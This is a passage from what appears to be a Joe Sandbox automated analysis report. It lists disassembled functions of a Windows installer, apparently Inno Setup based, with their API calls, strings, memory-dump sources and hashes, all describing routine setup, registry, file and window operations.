                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 0045891D
                                                                                                                                                                      • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458939
                                                                                                                                                                      Strings
                                                                                                                                                                      • Helper isn't responding; killing it., xrefs: 004588A7
                                                                                                                                                                      • Helper process exited., xrefs: 004588E5
                                                                                                                                                                      • Helper process exited with failure code: 0x%x, xrefs: 00458903
                                                                                                                                                                      • Stopping 64-bit helper process. (PID: %u), xrefs: 0045888D
                                                                                                                                                                      • Helper process exited, but failed to get exit code., xrefs: 0045890F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                                                                                                                      • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                                                                                                                      • API String ID: 3355656108-1243109208
                                                                                                                                                                      • Opcode ID: 4dbd683c4da886573a9d3d6bd5323e1fc1c5aa528df5b55e4795418a99c3c331
                                                                                                                                                                      • Instruction ID: 5c1f132ce02699e8ecfae473a4aa832f70e08e49b07aa2054fbd8a494dc4d87a
                                                                                                                                                                      • Opcode Fuzzy Hash: 4dbd683c4da886573a9d3d6bd5323e1fc1c5aa528df5b55e4795418a99c3c331
                                                                                                                                                                      • Instruction Fuzzy Hash: 582171706087409AD710E779C44575BB6D4AF48309F00C82FB9DAD7693DE7CE8488B6B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004544FC Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 228registryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0042DDDC: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE08
                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004546D3,?,00000000,00454797), ref: 00454623
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,004546D3,?,00000000,00454797), ref: 0045475F
                                                                                                                                                                        • Part of subcall function 0042E8C0: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453247,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8DF
                                                                                                                                                                      Strings
                                                                                                                                                                      • , xrefs: 00454585
                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0045453B
                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0045456B
                                                                                                                                                                      • RegCreateKeyEx, xrefs: 00454597
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseCreateFormatMessageQueryValue
                                                                                                                                                                      • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                                                                                                      • API String ID: 2481121983-1280779767
                                                                                                                                                                      • Opcode ID: 66ff5e3ad4d33a653921325293b3555be0d710f2f882c503dafddadd9ed76182
                                                                                                                                                                      • Instruction ID: 79a928fbfbb5cbc52e9f584d13fa8ff479f10e23804a0d57af644d787f67e4fc
                                                                                                                                                                      • Opcode Fuzzy Hash: 66ff5e3ad4d33a653921325293b3555be0d710f2f882c503dafddadd9ed76182
                                                                                                                                                                      • Instruction Fuzzy Hash: 4C812275A00209AFDB00DFD5C841BEEB7B9EF49305F50452AF900FB292D7789A49CB69
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0049615C Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 141fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00453890: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,-cI,_iu,?,00000000,004539CA), ref: 0045397F
                                                                                                                                                                        • Part of subcall function 00453890: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,-cI,_iu,?,00000000,004539CA), ref: 0045398F
                                                                                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 004961D9
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,0049632D), ref: 004961FA
                                                                                                                                                                      • CreateWindowExA.USER32(00000000,STATIC,0049633C,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00496221
                                                                                                                                                                      • SetWindowLongA.USER32(?,000000FC,004959B4), ref: 00496234
                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496300,?,?,000000FC,004959B4,00000000,STATIC,0049633C), ref: 00496264
                                                                                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 004962D8
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496300,?,?,000000FC,004959B4,00000000), ref: 004962E4
                                                                                                                                                                        • Part of subcall function 00453D04: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453DEB
                                                                                                                                                                      • 74075DF0.USER32(?,00496307,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496300,?,?,000000FC,004959B4,00000000,STATIC), ref: 004962FA
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileWindow$CloseCreateHandle$74075AttributesCopyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                                                                                                                      • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                                                                                                                      • API String ID: 3023532049-2312673372
                                                                                                                                                                      • Opcode ID: d72f6794aa83c350230af51559f59b5161bfb6884ae13efa74e88c0b26c9fb7c
                                                                                                                                                                      • Instruction ID: 59c6668a25180793b9734d4b881d6428f2164d7595bd96eb0933aaec2009094d
                                                                                                                                                                      • Opcode Fuzzy Hash: d72f6794aa83c350230af51559f59b5161bfb6884ae13efa74e88c0b26c9fb7c
                                                                                                                                                                      • Instruction Fuzzy Hash: 30413070A00204AFDF11EBA5DD42FAE7BB8EB09714F61457AF500F7291D7799A048B68
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0047C65C Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 95libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetFolderPathA), ref: 0047C75E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc
                                                                                                                                                                      • String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$imI$shell32.dll$shfolder.dll
                                                                                                                                                                      • API String ID: 190572456-2091577475
                                                                                                                                                                      • Opcode ID: 21d1352e928be82d95d8d147d65a71d779b6dba6327bee42b911c1605bbca507
                                                                                                                                                                      • Instruction ID: 1bc5907ccbf8c7c126ff73efdb0a93079a3df87e782a300c574b3872d81dfa42
                                                                                                                                                                      • Opcode Fuzzy Hash: 21d1352e928be82d95d8d147d65a71d779b6dba6327bee42b911c1605bbca507
                                                                                                                                                                      • Instruction Fuzzy Hash: BF311D30A00149DBCB00EFA9D9D29DEB7B5EB44305F61847BE404E7241DB389E45CBAD
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0042E410 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 86registrylibraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E515,?,00000000,0047DD24,00000000), ref: 0042E439
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E43F
                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E515,?,00000000,0047DD24,00000000), ref: 0042E48D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressCloseHandleModuleProc
                                                                                                                                                                      • String ID: %aE$.DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                                                                                                      • API String ID: 4190037839-4073108654
                                                                                                                                                                      • Opcode ID: 0725d421e1386afe0707a1d879cb0f21fd2a7d71538a5172a756e6edb66a5df0
                                                                                                                                                                      • Instruction ID: 54e13c124a033066941eeca65415b1323707e8dcf3020f71d3dbb5d1a98da02b
                                                                                                                                                                      • Opcode Fuzzy Hash: 0725d421e1386afe0707a1d879cb0f21fd2a7d71538a5172a756e6edb66a5df0
                                                                                                                                                                      • Instruction Fuzzy Hash: C5214430B10225BBDB00EAE7DC45B9E76B8EB48708F904477A500E7281E77CDE419B1C
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00462818 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 82libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetActiveWindow.USER32 ref: 00462824
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll), ref: 00462838
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462845
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462852
                                                                                                                                                                      • GetWindowRect.USER32(?,00000000), ref: 0046289E
                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 004628DC
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                                                                                                      • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                                                                                                      • API String ID: 2610873146-3407710046
                                                                                                                                                                      • Opcode ID: 7d3ae2eabbb2e0e3fb7b360462648fe4359c3aac8ff5529b10ff35dbd8114939
                                                                                                                                                                      • Instruction ID: 4c37a186de2a83ca6a9e6f1427afc5cce354ac5e92891655707437263646b99d
                                                                                                                                                                      • Opcode Fuzzy Hash: 7d3ae2eabbb2e0e3fb7b360462648fe4359c3aac8ff5529b10ff35dbd8114939
                                                                                                                                                                      • Instruction Fuzzy Hash: 8621C571700B006BD310E664DD41F3B3798EB84710F08063AF984DB3D2EAB8EC008B9A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0042F180 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 82libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetActiveWindow.USER32 ref: 0042F18C
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F1A0
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F1AD
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F1BA
                                                                                                                                                                      • GetWindowRect.USER32(?,00000000), ref: 0042F206
                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F244
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                                                                                                      • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                                                                                                      • API String ID: 2610873146-3407710046
                                                                                                                                                                      • Opcode ID: 65b3cc7f10ae0058e4125d4159f755093c22ec119fdd45fb082c526003a2f1c2
                                                                                                                                                                      • Instruction ID: fe4b6ce3f65a79f89e9c436b8398c0b3b6e1cac74b3897b930778965e8aa8e9e
                                                                                                                                                                      • Opcode Fuzzy Hash: 65b3cc7f10ae0058e4125d4159f755093c22ec119fdd45fb082c526003a2f1c2
                                                                                                                                                                      • Instruction Fuzzy Hash: 8A21D479300710ABD700D668EC81F3B36E8EB85710F88457AF944DB3C1DA79EC048BA9
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00458A3C Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 127pipeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00458C1B,?,00000000,00458C7E,?,?,022E3858,00000000), ref: 00458A99
                                                                                                                                                                      • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,022E3858,?,00000000,00458BB0,?,00000000,00000001,00000000,00000000,00000000,00458C1B), ref: 00458AF6
                                                                                                                                                                      • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,022E3858,?,00000000,00458BB0,?,00000000,00000001,00000000,00000000,00000000,00458C1B), ref: 00458B03
                                                                                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00458B4F
                                                                                                                                                                      • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458B89,?,-00000020,0000000C,-00004034,00000014,022E3858,?,00000000,00458BB0,?,00000000), ref: 00458B75
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,00000000,00000001,00458B89,?,-00000020,0000000C,-00004034,00000014,022E3858,?,00000000,00458BB0,?,00000000), ref: 00458B7C
                                                                                                                                                                        • Part of subcall function 00453470: GetLastError.KERNEL32(00000000,00454005,00000005,00000000,0045403A,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004978B1,00000000), ref: 00453473
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                                                                                                                      • String ID: CreateEvent$TransactNamedPipe
                                                                                                                                                                      • API String ID: 2182916169-3012584893
                                                                                                                                                                      • Opcode ID: 4313f08c2cb8c179d04d2677b720d9b689516749554c19064abb58b7727eccfe
                                                                                                                                                                      • Instruction ID: 8abbb299140198d1acf2f300c186b6d7a0c7583c2a92940a340f901db1703015
                                                                                                                                                                      • Opcode Fuzzy Hash: 4313f08c2cb8c179d04d2677b720d9b689516749554c19064abb58b7727eccfe
                                                                                                                                                                      • Instruction Fuzzy Hash: D4418771A00608EFDB15DF95CD81F9EB7F8EB48714F10406AF904F7292DA789E44CA28
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00456B40 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 99libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00456CA5,?,?,00000031,?), ref: 00456B68
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456B6E
                                                                                                                                                                      • LoadTypeLib.OLEAUT32(00000000,?), ref: 00456BBB
                                                                                                                                                                        • Part of subcall function 00453470: GetLastError.KERNEL32(00000000,00454005,00000005,00000000,0045403A,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004978B1,00000000), ref: 00453473
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                                                                                                                      • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                                                                                                                      • API String ID: 1914119943-2711329623
                                                                                                                                                                      • Opcode ID: 63403efc4e400188d95ec7437881b6873146c92b298f72c954457eeadad50020
                                                                                                                                                                      • Instruction ID: 90c7a9fdd6b9eff4f50a7868ac1bc5a0a48bbd230e3c9f86fc21845b06ed4ed7
                                                                                                                                                                      • Opcode Fuzzy Hash: 63403efc4e400188d95ec7437881b6873146c92b298f72c954457eeadad50020
                                                                                                                                                                      • Instruction Fuzzy Hash: 1B31B271A00A04AF9702EFAACC51D5BB7BDEB89746752846AFC04D3752DA38DD04C768
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00416D78 Relevance: 15.2, APIs: 10, Instructions: 167windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RectVisible.GDI32(?,?), ref: 00416E0B
                                                                                                                                                                      • SaveDC.GDI32(?), ref: 00416E1F
                                                                                                                                                                      • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E42
                                                                                                                                                                      • RestoreDC.GDI32(?,?), ref: 00416E5D
                                                                                                                                                                      • CreateSolidBrush.GDI32(00000000), ref: 00416EDD
                                                                                                                                                                      • FrameRect.USER32(?,?,?), ref: 00416F10
                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00416F1A
                                                                                                                                                                      • CreateSolidBrush.GDI32(00000000), ref: 00416F2A
                                                                                                                                                                      • FrameRect.USER32(?,?,?), ref: 00416F5D
                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00416F67
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 375863564-0
                                                                                                                                                                      • Opcode ID: c6e9da092252b0d843e50425d9702d826d96d7703ae0af1416940bd7ec6b9b3c
                                                                                                                                                                      • Instruction ID: 3aa003abb57efcc62207c922e0442432c52dbc4458161ac97ea4a6727b5fec63
                                                                                                                                                                      • Opcode Fuzzy Hash: c6e9da092252b0d843e50425d9702d826d96d7703ae0af1416940bd7ec6b9b3c
                                                                                                                                                                      • Instruction Fuzzy Hash: 7F512B716086459FDB50EF29C8C0B9777E8AF48314F15466ABD889B287C738EC81CB99
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00404ABF Relevance: 15.1, APIs: 10, Instructions: 122fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                                                                                                                                      • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                                                                                                                                      • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                                                                                                                                      • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                                                                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                                                                                                                                      • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                                                                                                                                      • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                                                                                                                                      • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                                                                                                                                      Memory Dump Source
